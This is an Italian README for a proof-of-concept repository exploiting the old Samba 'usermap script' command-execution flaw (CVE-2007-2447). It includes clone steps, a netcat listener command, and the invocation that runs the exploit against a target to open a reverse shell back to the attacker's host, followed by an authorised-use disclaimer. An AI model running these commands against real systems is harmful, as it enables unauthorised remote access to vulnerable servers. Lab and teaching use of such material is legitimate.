
Exploit proof-of-concept per l'esecuzione remota di comandi tramite script usermap di Samba (CVE-2007-2447) con consegna del payload reverse shell per test di laboratorio educativi.
PoC: Esecuzione di comandi remoti di Samba "usermap script" (CVE storico). Questo repository contiene un piccolo script proof-of-concept per ricerca e revisione educativa. Lo script principale è usermap_script_Command_Execution.py.
Riferimento writeup: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Clona il repository ed esegui lo script in un laboratorio controllato. Il PoC utilizza opzionalmente una reverse shell verso LHOST:LPORT — avvia il tuo listener prima di eseguire lo script e assicurati che le dipendenze siano installate (vedi Installazione).
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
Parametri
RHOST — IP o hostname di destinazioneRPORT — porta TCP di destinazione (tipicamente 139)LHOST — IP del listener per una connessione inversaLPORT — porta del listenerConsigliato: crea un ambiente virtuale Python isolato e installa le dipendenze da requirements.txt prima di eseguire lo script.
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
Questo codice è fornito esclusivamente per ricerca legittima sulla sicurezza, educazione e test difensivi. Non eseguire questo script contro alcun sistema che non possiedi o per cui non hai esplicita autorizzazione scritta. L'uso improprio può portare a conseguenze legali; il proprietario del repository non è responsabile per uso improprio.
Preferisci sempre la revisione statica del codice e il test in laboratorio controllato (snapshot di VM, reti isolate e catture di pacchetti) quando analizzi codice potenzialmente pericoloso.
Se desideri una guida annotata non eseguibile o un requirements.txt, apri una segnalazione o richiedilo qui.